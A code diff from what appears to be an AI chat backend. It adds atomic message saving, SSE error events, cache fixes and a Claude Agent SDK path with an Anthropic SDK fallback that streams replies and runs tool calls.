|
||||||
"default": "prompts/chat_system.md",
|
"default": "prompts/chat_system.md",
|
||||||
|
|||||||
@@ -273,9 +273,8 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
|
|||||||
try:
|
try:
|
||||||
session = ChatSession.model_validate_json(raw_session)
|
session = ChatSession.model_validate_json(raw_session)
|
||||||
logger.info(
|
logger.info(
|
||||||
f"Loading session {session_id} from cache: "
|
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
|
||||||
f"message_count={len(session.messages)}, "
|
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
|
||||||
f"roles={[m.role for m in session.messages]}"
|
|
||||||
)
|
)
|
||||||
return session
|
return session
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
@@ -317,11 +316,9 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
messages = prisma_session.Messages
|
messages = prisma_session.Messages
|
||||||
logger.info(
|
logger.debug(
|
||||||
f"Loading session {session_id} from DB: "
|
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
|
||||||
f"has_messages={messages is not None}, "
|
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
|
||||||
f"message_count={len(messages) if messages else 0}, "
|
|
||||||
f"roles={[m.role for m in messages] if messages else []}"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
return ChatSession.from_db(prisma_session, messages)
|
return ChatSession.from_db(prisma_session, messages)
|
||||||
@@ -372,10 +369,9 @@ async def _save_session_to_db(
|
|||||||
"function_call": msg.function_call,
|
"function_call": msg.function_call,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
logger.info(
|
logger.debug(
|
||||||
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
|
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
|
||||||
f"roles={[m['role'] for m in messages_data]}, "
|
f"roles={[m['role'] for m in messages_data]}"
|
||||||
f"start_sequence={existing_message_count}"
|
|
||||||
)
|
)
|
||||||
await chat_db.add_chat_messages_batch(
|
await chat_db.add_chat_messages_batch(
|
||||||
session_id=session.session_id,
|
session_id=session.session_id,
|
||||||
@@ -415,7 +411,7 @@ async def get_chat_session(
|
|||||||
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
|
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
|
||||||
|
|
||||||
# Fall back to database
|
# Fall back to database
|
||||||
logger.info(f"Session {session_id} not in cache, checking database")
|
logger.debug(f"Session {session_id} not in cache, checking database")
|
||||||
session = await _get_session_from_db(session_id)
|
session = await _get_session_from_db(session_id)
|
||||||
|
|
||||||
if session is None:
|
if session is None:
|
||||||
@@ -432,7 +428,6 @@ async def get_chat_session(
|
|||||||
# Cache the session from DB
|
# Cache the session from DB
|
||||||
try:
|
try:
|
||||||
await _cache_session(session)
|
await _cache_session(session)
|
||||||
logger.info(f"Cached session {session_id} from database")
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logger.warning(f"Failed to cache session {session_id}: {e}")
|
logger.warning(f"Failed to cache session {session_id}: {e}")
|
||||||
|
|
||||||
@@ -497,6 +492,40 @@ async def upsert_chat_session(
|
|||||||
return session
|
return session
|
||||||
|
|
||||||
|
|
||||||
|
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
|
||||||
|
"""Atomically append a message to a session and persist it.
|
||||||
|
|
||||||
|
Acquires the session lock, re-fetches the latest session state,
|
||||||
|
appends the message, and saves — preventing message loss when
|
||||||
|
concurrent requests modify the same session.
|
||||||
|
"""
|
||||||
|
lock = await _get_session_lock(session_id)
|
||||||
|
|
||||||
|
async with lock:
|
||||||
|
session = await get_chat_session(session_id)
|
||||||
|
if session is None:
|
||||||
|
raise ValueError(f"Session {session_id} not found")
|
||||||
|
|
||||||
|
session.messages.append(message)
|
||||||
|
existing_message_count = await chat_db.get_chat_session_message_count(
|
||||||
|
session_id
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
await _save_session_to_db(session, existing_message_count)
|
||||||
|
except Exception as e:
|
||||||
|
raise DatabaseError(
|
||||||
|
f"Failed to persist message to session {session_id}"
|
||||||
|
) from e
|
||||||
|
|
||||||
|
try:
|
||||||
|
await _cache_session(session)
|
||||||
|
except Exception as e:
|
||||||
|
logger.warning(f"Cache write failed for session {session_id}: {e}")
|
||||||
|
|
||||||
|
return session
|
||||||
|
|
||||||
|
|
||||||
async def create_chat_session(user_id: str) -> ChatSession:
|
async def create_chat_session(user_id: str) -> ChatSession:
|
||||||
"""Create a new chat session and persist it.
|
"""Create a new chat session and persist it.
|
||||||
|
|
||||||
@@ -603,13 +632,19 @@ async def update_session_title(session_id: str, title: str) -> bool:
|
|||||||
logger.warning(f"Session {session_id} not found for title update")
|
logger.warning(f"Session {session_id} not found for title update")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# Invalidate cache so next fetch gets updated title
|
# Update title in cache if it exists (instead of invalidating).
|
||||||
|
# This prevents race conditions where cache invalidation causes
|
||||||
|
# the frontend to see stale DB data while streaming is still in progress.
|
||||||
try:
|
try:
|
||||||
redis_key = _get_session_cache_key(session_id)
|
cached = await _get_session_from_cache(session_id)
|
||||||
async_redis = await get_redis_async()
|
if cached:
|
||||||
await async_redis.delete(redis_key)
|
cached.title = title
|
||||||
|
await _cache_session(cached)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
|
# Not critical - title will be correct on next full cache refresh
|
||||||
|
logger.warning(
|
||||||
|
f"Failed to update title in cache for session {session_id}: {e}"
|
||||||
|
)
|
||||||
|
|
||||||
return True
|
return True
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
|||||||
@@ -10,6 +10,8 @@ from typing import Any
|
|||||||
|
|
||||||
from pydantic import BaseModel, Field
|
from pydantic import BaseModel, Field
|
||||||
|
|
||||||
|
from backend.util.json import dumps as json_dumps
|
||||||
|
|
||||||
|
|
||||||
class ResponseType(str, Enum):
|
class ResponseType(str, Enum):
|
||||||
"""Types of streaming responses following AI SDK protocol."""
|
"""Types of streaming responses following AI SDK protocol."""
|
||||||
@@ -193,6 +195,18 @@ class StreamError(StreamBaseResponse):
|
|||||||
default=None, description="Additional error details"
|
default=None, description="Additional error details"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
def to_sse(self) -> str:
|
||||||
|
"""Convert to SSE format, only emitting fields required by AI SDK protocol.
|
||||||
|
|
||||||
|
The AI SDK uses z.strictObject({type, errorText}) which rejects
|
||||||
|
any extra fields like `code` or `details`.
|
||||||
|
"""
|
||||||
|
data = {
|
||||||
|
"type": self.type.value,
|
||||||
|
"errorText": self.errorText,
|
||||||
|
}
|
||||||
|
return f"data: {json_dumps(data)}\n\n"
|
||||||
|
|
||||||
|
|
||||||
class StreamHeartbeat(StreamBaseResponse):
|
class StreamHeartbeat(StreamBaseResponse):
|
||||||
"""Heartbeat to keep SSE connection alive during long-running operations.
|
"""Heartbeat to keep SSE connection alive during long-running operations.
|
||||||
|
|||||||
@@ -1,5 +1,6 @@
|
|||||||
"""Chat API routes for chat session management and streaming via SSE."""
|
"""Chat API routes for chat session management and streaming via SSE."""
|
||||||
|
|
||||||
|
import asyncio
|
||||||
import logging
|
import logging
|
||||||
import uuid as uuid_module
|
import uuid as uuid_module
|
||||||
from collections.abc import AsyncGenerator
|
from collections.abc import AsyncGenerator
|
||||||
@@ -16,8 +17,16 @@ from . import service as chat_service
|
|||||||
from . import stream_registry
|
from . import stream_registry
|
||||||
from .completion_handler import process_operation_failure, process_operation_success
|
from .completion_handler import process_operation_failure, process_operation_success
|
||||||
from .config import ChatConfig
|
from .config import ChatConfig
|
||||||
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
|
from .model import (
|
||||||
from .response_model import StreamFinish, StreamHeartbeat
|
ChatMessage,
|
||||||
|
ChatSession,
|
||||||
|
append_and_save_message,
|
||||||
|
create_chat_session,
|
||||||
|
get_chat_session,
|
||||||
|
get_user_sessions,
|
||||||
|
)
|
||||||
|
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
|
||||||
|
from .sdk import service as sdk_service
|
||||||
from .tools.models import (
|
from .tools.models import (
|
||||||
AgentDetailsResponse,
|
AgentDetailsResponse,
|
||||||
AgentOutputResponse,
|
AgentOutputResponse,
|
||||||
@@ -40,6 +49,7 @@ from .tools.models import (
|
|||||||
SetupRequirementsResponse,
|
SetupRequirementsResponse,
|
||||||
UnderstandingUpdatedResponse,
|
UnderstandingUpdatedResponse,
|
||||||
)
|
)
|
||||||
|
from .tracking import track_user_message
|
||||||
|
|
||||||
config = ChatConfig()
|
config = ChatConfig()
|
||||||
|
|
||||||
@@ -231,6 +241,10 @@ async def get_session(
|
|||||||
active_task, last_message_id = await stream_registry.get_active_task_for_session(
|
active_task, last_message_id = await stream_registry.get_active_task_for_session(
|
||||||
session_id, user_id
|
session_id, user_id
|
||||||
)
|
)
|
||||||
|
logger.info(
|
||||||
|
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
|
||||||
|
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
|
||||||
|
)
|
||||||
if active_task:
|
if active_task:
|
||||||
# Filter out the in-progress assistant message from the session response.
|
# Filter out the in-progress assistant message from the session response.
|
||||||
# The client will receive the complete assistant response through the SSE
|
# The client will receive the complete assistant response through the SSE
|
||||||
@@ -300,10 +314,9 @@ async def stream_chat_post(
|
|||||||
f"user={user_id}, message_len={len(request.message)}",
|
f"user={user_id}, message_len={len(request.message)}",
|
||||||
extra={"json_fields": log_meta},
|
extra={"json_fields": log_meta},
|
||||||
)
|
)
|
||||||
|
|
||||||
session = await _validate_and_get_session(session_id, user_id)
|
session = await _validate_and_get_session(session_id, user_id)
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
|
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
|
||||||
extra={
|
extra={
|
||||||
"json_fields": {
|
"json_fields": {
|
||||||
**log_meta,
|
**log_meta,
|
||||||
@@ -312,6 +325,25 @@ async def stream_chat_post(
|
|||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Atomically append user message to session BEFORE creating task to avoid
|
||||||
|
# race condition where GET_SESSION sees task as "running" but message isn't
|
||||||
|
# saved yet. append_and_save_message re-fetches inside a lock to prevent
|
||||||
|
# message loss from concurrent requests.
|
||||||
|
if request.message:
|
||||||
|
message = ChatMessage(
|
||||||
|
role="user" if request.is_user_message else "assistant",
|
||||||
|
content=request.message,
|
||||||
|
)
|
||||||
|
if request.is_user_message:
|
||||||
|
track_user_message(
|
||||||
|
user_id=user_id,
|
||||||
|
session_id=session_id,
|
||||||
|
message_length=len(request.message),
|
||||||
|
)
|
||||||
|
logger.info(f"[STREAM] Saving user message to session {session_id}")
|
||||||
|
session = await append_and_save_message(session_id, message)
|
||||||
|
logger.info(f"[STREAM] User message saved for session {session_id}")
|
||||||
|
|
||||||
# Create a task in the stream registry for reconnection support
|
# Create a task in the stream registry for reconnection support
|
||||||
task_id = str(uuid_module.uuid4())
|
task_id = str(uuid_module.uuid4())
|
||||||
operation_id = str(uuid_module.uuid4())
|
operation_id = str(uuid_module.uuid4())
|
||||||
@@ -327,7 +359,7 @@ async def stream_chat_post(
|
|||||||
operation_id=operation_id,
|
operation_id=operation_id,
|
||||||
)
|
)
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
|
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
|
||||||
extra={
|
extra={
|
||||||
"json_fields": {
|
"json_fields": {
|
||||||
**log_meta,
|
**log_meta,
|
||||||
@@ -348,15 +380,43 @@ async def stream_chat_post(
|
|||||||
first_chunk_time, ttfc = None, None
|
first_chunk_time, ttfc = None, None
|
||||||
chunk_count = 0
|
chunk_count = 0
|
||||||
try:
|
try:
|
||||||
async for chunk in chat_service.stream_chat_completion(
|
# Emit a start event with task_id for reconnection
|
||||||
|
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
|
||||||
|
await stream_registry.publish_chunk(task_id, start_chunk)
|
||||||
|
logger.info(
|
||||||
|
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
|
||||||
|
extra={
|
||||||
|
"json_fields": {
|
||||||
|
**log_meta,
|
||||||
|
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
|
||||||
|
* 1000,
|
||||||
|
}
|
||||||
|
},
|
||||||
|
)
|
||||||
|
|
||||||
|
# Choose service based on configuration
|
||||||
|
use_sdk = config.use_claude_agent_sdk
|
||||||
|
stream_fn = (
|
||||||
|
sdk_service.stream_chat_completion_sdk
|
||||||
|
if use_sdk
|
||||||
|
else chat_service.stream_chat_completion
|
||||||
|
)
|
||||||
|
logger.info(
|
||||||
|
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
|
||||||
|
extra={"json_fields": log_meta},
|
||||||
|
)
|
||||||
|
# Pass message=None since we already added it to the session above
|
||||||
|
async for chunk in stream_fn(
|
||||||
session_id,
|
session_id,
|
||||||
request.message,
|
None, # Message already in session
|
||||||
is_user_message=request.is_user_message,
|
is_user_message=request.is_user_message,
|
||||||
user_id=user_id,
|
user_id=user_id,
|
||||||
session=session, # Pass pre-fetched session to avoid double-fetch
|
session=session, # Pass session with message already added
|
||||||
context=request.context,
|
context=request.context,
|
||||||
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
|
|
||||||
):
|
):
|
||||||
|
# Skip duplicate StreamStart — we already published one above
|
||||||
|
if isinstance(chunk, StreamStart):
|
||||||
|
continue
|
||||||
chunk_count += 1
|
chunk_count += 1
|
||||||
if first_chunk_time is None:
|
if first_chunk_time is None:
|
||||||
first_chunk_time = time_module.perf_counter()
|
first_chunk_time = time_module.perf_counter()
|
||||||
@@ -377,7 +437,7 @@ async def stream_chat_post(
|
|||||||
gen_end_time = time_module.perf_counter()
|
gen_end_time = time_module.perf_counter()
|
||||||
total_time = (gen_end_time - gen_start_time) * 1000
|
total_time = (gen_end_time - gen_start_time) * 1000
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
|
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
|
||||||
f"task={task_id}, session={session_id}, "
|
f"task={task_id}, session={session_id}, "
|
||||||
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
|
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
|
||||||
extra={
|
extra={
|
||||||
@@ -404,6 +464,17 @@ async def stream_chat_post(
|
|||||||
}
|
}
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
# Publish a StreamError so the frontend can display an error message
|
||||||
|
try:
|
||||||
|
await stream_registry.publish_chunk(
|
||||||
|
task_id,
|
||||||
|
StreamError(
|
||||||
|
errorText="An error occurred. Please try again.",
|
||||||
|
code="stream_error",
|
||||||
|
),
|
||||||
|
)
|
||||||
|
except Exception:
|
||||||
|
pass # Best-effort; mark_task_completed will publish StreamFinish
|
||||||
await stream_registry.mark_task_completed(task_id, "failed")
|
await stream_registry.mark_task_completed(task_id, "failed")
|
||||||
|
|
||||||
# Start the AI generation in a background task
|
# Start the AI generation in a background task
|
||||||
@@ -506,8 +577,14 @@ async def stream_chat_post(
|
|||||||
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
|
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
# Surface error to frontend so it doesn't appear stuck
|
||||||
|
yield StreamError(
|
||||||
|
errorText="An error occurred. Please try again.",
|
||||||
|
code="stream_error",
|
||||||
|
).to_sse()
|
||||||
|
yield StreamFinish().to_sse()
|
||||||
finally:
|
finally:
|
||||||
# Unsubscribe when client disconnects or stream ends to prevent resource leak
|
# Unsubscribe when client disconnects or stream ends
|
||||||
if subscriber_queue is not None:
|
if subscriber_queue is not None:
|
||||||
try:
|
try:
|
||||||
await stream_registry.unsubscribe_from_task(
|
await stream_registry.unsubscribe_from_task(
|
||||||
@@ -751,8 +828,6 @@ async def stream_task(
|
|||||||
)
|
)
|
||||||
|
|
||||||
async def event_generator() -> AsyncGenerator[str, None]:
|
async def event_generator() -> AsyncGenerator[str, None]:
|
||||||
import asyncio
|
|
||||||
|
|
||||||
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
|
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
|
|||||||
@@ -0,0 +1,14 @@
|
|||||||
|
"""Claude Agent SDK integration for CoPilot.
|
||||||
|
|
||||||
|
This module provides the integration layer between the Claude Agent SDK
|
||||||
|
and the existing CoPilot tool system, enabling drop-in replacement of
|
||||||
|
the current LLM orchestration with the battle-tested Claude Agent SDK.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from .service import stream_chat_completion_sdk
|
||||||
|
from .tool_adapter import create_copilot_mcp_server
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"stream_chat_completion_sdk",
|
||||||
|
"create_copilot_mcp_server",
|
||||||
|
]
|
||||||
@@ -0,0 +1,354 @@
|
|||||||
|
"""Anthropic SDK fallback implementation.
|
||||||
|
|
||||||
|
This module provides the fallback streaming implementation using the Anthropic SDK
|
||||||
|
directly when the Claude Agent SDK is not available.
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
import uuid
|
||||||
|
from collections.abc import AsyncGenerator
|
||||||
|
from typing import Any, cast
|
||||||
|
|
||||||
|
from ..config import ChatConfig
|
||||||
|
from ..model import ChatMessage, ChatSession
|
||||||
|
from ..response_model import (
|
||||||
|
StreamBaseResponse,
|
||||||
|
StreamError,
|
||||||
|
StreamFinish,
|
||||||
|
StreamTextDelta,
|
||||||
|
StreamTextEnd,
|
||||||
|
StreamTextStart,
|
||||||
|
StreamToolInputAvailable,
|
||||||
|
StreamToolInputStart,
|
||||||
|
StreamToolOutputAvailable,
|
||||||
|
StreamUsage,
|
||||||
|
)
|
||||||
|
from .tool_adapter import get_tool_definitions, get_tool_handlers
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
config = ChatConfig()
|
||||||
|
|
||||||
|
# Maximum tool-call iterations before stopping to prevent infinite loops
|
||||||
|
_MAX_TOOL_ITERATIONS = 10
|
||||||
|
|
||||||
|
|
||||||
|
async def stream_with_anthropic(
|
||||||
|
session: ChatSession,
|
||||||
|
system_prompt: str,
|
||||||
|
text_block_id: str,
|
||||||
|
) -> AsyncGenerator[StreamBaseResponse, None]:
|
||||||
|
"""Stream using Anthropic SDK directly with tool calling support.
|
||||||
|
|
||||||
|
This function accumulates messages into the session for persistence.
|
||||||
|
The caller should NOT yield an additional StreamFinish - this function handles it.
|
||||||
|
"""
|
||||||
|
import anthropic
|
||||||
|
|
||||||
|
# Only use ANTHROPIC_API_KEY - don't fall back to OpenRouter keys
|
||||||
|
api_key = os.getenv("ANTHROPIC_API_KEY")
|
||||||
|
if not api_key:
|
||||||
|
yield StreamError(
|
||||||
|
errorText="ANTHROPIC_API_KEY not configured for fallback",
|
||||||
|
code="config_error",
|
||||||
|
)
|
||||||
|
yield StreamFinish()
|
||||||
|
return
|
||||||
|
|
||||||
|
client = anthropic.AsyncAnthropic(api_key=api_key)
|
||||||
|
tool_definitions = get_tool_definitions()
|
||||||
|
tool_handlers = get_tool_handlers()
|
||||||
|
|
||||||
|
anthropic_tools = [
|
||||||
|
{
|
||||||
|
"name": t["name"],
|
||||||
|
"description": t["description"],
|
||||||
|
"input_schema": t["inputSchema"],
|
||||||
|
}
|
||||||
|
for t in tool_definitions
|
||||||
|
]
|
||||||
|
|
||||||
|
anthropic_messages = _convert_session_to_anthropic(session)
|
||||||
|
|
||||||
|
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
|
||||||
|
anthropic_messages.append(
|
||||||
|
{"role": "user", "content": "Continue with the task."}
|
||||||
|
)
|
||||||
|
|
||||||
|
has_started_text = False
|
||||||
|
accumulated_text = ""
|
||||||
|
accumulated_tool_calls: list[dict[str, Any]] = []
|
||||||
|
|
||||||
|
for _ in range(_MAX_TOOL_ITERATIONS):
|
||||||
|
try:
|
||||||
|
async with client.messages.stream(
|
||||||
|
model=(
|
||||||
|
config.model.split("/")[-1] if "/" in config.model else config.model
|
||||||
|
),
|
||||||
|
max_tokens=4096,
|
||||||
|
system=system_prompt,
|
||||||
|
messages=cast(Any, anthropic_messages),
|
||||||
|
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
|
||||||
|
) as stream:
|
||||||
|
async for event in stream:
|
||||||
|
if event.type == "content_block_start":
|
||||||
|
block = event.content_block
|
||||||
|
if hasattr(block, "type"):
|
||||||
|
if block.type == "text" and not has_started_text:
|
||||||
|
yield StreamTextStart(id=text_block_id)
|
||||||
|
has_started_text = True
|
||||||
|
elif block.type == "tool_use":
|
||||||
|
yield StreamToolInputStart(
|
||||||
|
toolCallId=block.id, toolName=block.name
|
||||||
|
)
|
||||||
|
|
||||||
|
elif event.type == "content_block_delta":
|
||||||
|
delta = event.delta
|
||||||
|
if hasattr(delta, "type") and delta.type == "text_delta":
|
||||||
|
accumulated_text += delta.text
|
||||||
|
yield StreamTextDelta(id=text_block_id, delta=delta.text)
|
||||||
|
|
||||||
|
final_message = await stream.get_final_message()
|
||||||
|
|
||||||
|
if final_message.stop_reason == "tool_use":
|
||||||
|
if has_started_text:
|
||||||
|
yield StreamTextEnd(id=text_block_id)
|
||||||
|
has_started_text = False
|
||||||
|
text_block_id = str(uuid.uuid4())
|
||||||
|
|
||||||
|
tool_results = []
|
||||||
|
assistant_content: list[dict[str, Any]] = []
|
||||||
|
|
||||||
|
for block in final_message.content:
|
||||||
|
if block.type == "text":
|
||||||
|
assistant_content.append(
|
||||||
|
{"type": "text", "text": block.text}
|
||||||
|
)
|
||||||
|
elif block.type == "tool_use":
|
||||||
|
assistant_content.append(
|
||||||
|
{
|
||||||
|
"type": "tool_use",
|
||||||
|
"id": block.id,
|
||||||
|
"name": block.name,
|
||||||
|
"input": block.input,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
# Track tool call for session persistence
|
||||||
|
accumulated_tool_calls.append(
|
||||||
|
{
|
||||||
|
"id": block.id,
|
||||||
|
"type": "function",
|
||||||
|
"function": {
|
||||||
|
"name": block.name,
|
||||||
|
"arguments": json.dumps(
|
||||||
|
block.input
|
||||||
|
if isinstance(block.input, dict)
|
||||||
|
else {}
|
||||||
|
),
|
||||||
|
},
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
yield StreamToolInputAvailable(
|
||||||
|
toolCallId=block.id,
|
||||||
|
toolName=block.name,
|
||||||
|
input=(
|
||||||
|
block.input if isinstance(block.input, dict) else {}
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
output, is_error = await _execute_tool(
|
||||||
|
block.name, block.input, tool_handlers
|
||||||
|
)
|
||||||
|
|
||||||
|
yield StreamToolOutputAvailable(
|
||||||
|
toolCallId=block.id,
|
||||||
|
toolName=block.name,
|
||||||
|
output=output,
|
||||||
|
success=not is_error,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Save tool result to session
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(
|
||||||
|
role="tool",
|
||||||
|
content=output,
|
||||||
|
tool_call_id=block.id,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
|
tool_results.append(
|
||||||
|
{
|
||||||
|
"type": "tool_result",
|
||||||
|
"tool_use_id": block.id,
|
||||||
|
"content": output,
|
||||||
|
"is_error": is_error,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
# Save assistant message with tool calls to session
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(
|
||||||
|
role="assistant",
|
||||||
|
content=accumulated_text or None,
|
||||||
|
tool_calls=(
|
||||||
|
accumulated_tool_calls
|
||||||
|
if accumulated_tool_calls
|
||||||
|
else None
|
||||||
|
),
|
||||||
|
)
|
||||||
|
)
|
||||||
|
# Reset for next iteration
|
||||||
|
accumulated_text = ""
|
||||||
|
accumulated_tool_calls = []
|
||||||
|
|
||||||
|
anthropic_messages.append(
|
||||||
|
{"role": "assistant", "content": assistant_content}
|
||||||
|
)
|
||||||
|
anthropic_messages.append({"role": "user", "content": tool_results})
|
||||||
|
continue
|
||||||
|
|
||||||
|
else:
|
||||||
|
if has_started_text:
|
||||||
|
yield StreamTextEnd(id=text_block_id)
|
||||||
|
|
||||||
|
# Save final assistant response to session
|
||||||
|
if accumulated_text:
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(role="assistant", content=accumulated_text)
|
||||||
|
)
|
||||||
|
|
||||||
|
yield StreamUsage(
|
||||||
|
promptTokens=final_message.usage.input_tokens,
|
||||||
|
completionTokens=final_message.usage.output_tokens,
|
||||||
|
totalTokens=final_message.usage.input_tokens
|
||||||
|
+ final_message.usage.output_tokens,
|
||||||
|
)
|
||||||
|
yield StreamFinish()
|
||||||
|
return
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
|
||||||
|
yield StreamError(
|
||||||
|
errorText="An error occurred. Please try again.",
|
||||||
|
code="anthropic_error",
|
||||||
|
)
|
||||||
|
yield StreamFinish()
|
||||||
|
return
|
||||||
|
|
||||||
|
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
|
||||||
|
yield StreamFinish()
|
||||||
|
|
||||||
|
|
||||||
|
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
|
||||||
|
"""Convert session messages to Anthropic format.
|
||||||
|
|
||||||
|
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
|
||||||
|
"""
|
||||||
|
messages: list[dict[str, Any]] = []
|
||||||
|
|
||||||
|
for msg in session.messages:
|
||||||
|
if msg.role == "user":
|
||||||
|
new_msg = {"role": "user", "content": msg.content or ""}
|
||||||
|
elif msg.role == "assistant":
|
||||||
|
content: list[dict[str, Any]] = []
|
||||||
|
if msg.content:
|
||||||
|
content.append({"type": "text", "text": msg.content})
|
||||||
|
if msg.tool_calls:
|
||||||
|
for tc in msg.tool_calls:
|
||||||
|
func = tc.get("function", {})
|
||||||
|
args = func.get("arguments", {})
|
||||||
|
if isinstance(args, str):
|
||||||
|
try:
|
||||||
|
args = json.loads(args)
|
||||||
|
except json.JSONDecodeError:
|
||||||
|
args = {}
|
||||||
|
content.append(
|
||||||
|
{
|
||||||
|
"type": "tool_use",
|
||||||
|
"id": tc.get("id", str(uuid.uuid4())),
|
||||||
|
"name": func.get("name", ""),
|
||||||
|
"input": args,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
if content:
|
||||||
|
new_msg = {"role": "assistant", "content": content}
|
||||||
|
else:
|
||||||
|
continue # Skip empty assistant messages
|
||||||
|
elif msg.role == "tool":
|
||||||
|
new_msg = {
|
||||||
|
"role": "user",
|
||||||
|
"content": [
|
||||||
|
{
|
||||||
|
"type": "tool_result",
|
||||||
|
"tool_use_id": msg.tool_call_id or "",
|
||||||
|
"content": msg.content or "",
|
||||||
|
}
|
||||||
|
],
|
||||||
|
}
|
||||||
|
else:
|
||||||
|
continue
|
||||||
|
|
||||||
|
messages.append(new_msg)
|
||||||
|
|
||||||
|
# Merge consecutive same-role messages (Anthropic requires alternating roles)
|
||||||
|
return _merge_consecutive_roles(messages)
|
||||||
|
|
||||||
|
|
||||||
|
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
|
||||||
|
"""Merge consecutive messages with the same role.
|
||||||
|
|
||||||
|
Anthropic API requires alternating user/assistant roles.
|
||||||
|
"""
|
||||||
|
if not messages:
|
||||||
|
return []
|
||||||
|
|
||||||
|
merged: list[dict[str, Any]] = []
|
||||||
|
for msg in messages:
|
||||||
|
if merged and merged[-1]["role"] == msg["role"]:
|
||||||
|
# Merge with previous message
|
||||||
|
prev_content = merged[-1]["content"]
|
||||||
|
new_content = msg["content"]
|
||||||
|
|
||||||
|
# Normalize both to list-of-blocks form
|
||||||
|
if isinstance(prev_content, str):
|
||||||
|
prev_content = [{"type": "text", "text": prev_content}]
|
||||||
|
if isinstance(new_content, str):
|
||||||
|
new_content = [{"type": "text", "text": new_content}]
|
||||||
|
|
||||||
|
# Ensure both are lists
|
||||||
|
if not isinstance(prev_content, list):
|
||||||
|
prev_content = [prev_content]
|
||||||
|
if not isinstance(new_content, list):
|
||||||
|
new_content = [new_content]
|
||||||
|
|
||||||
|
merged[-1]["content"] = prev_content + new_content
|
||||||
|
else:
|
||||||
|
merged.append(msg)
|
||||||
|
|
||||||
|
return merged
|
||||||
|
|
||||||
|
|
||||||
|
async def _execute_tool(
|
||||||
|
tool_name: str, tool_input: Any, handlers: dict[str, Any]
|
||||||
|
) -> tuple[str, bool]:
|
||||||
|
"""Execute a tool and return (output, is_error)."""
|
||||||
|
handler = handlers.get(tool_name)
|
||||||
|
if not handler:
|
||||||
|
return f"Unknown tool: {tool_name}", True
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = await handler(tool_input)
|
||||||
|
# Safely extract output - handle empty or missing content
|
||||||
|
content = result.get("content") or []
|
||||||
|
if content and isinstance(content, list) and len(content) > 0:
|
||||||
|
first_item = content[0]
|
||||||
|
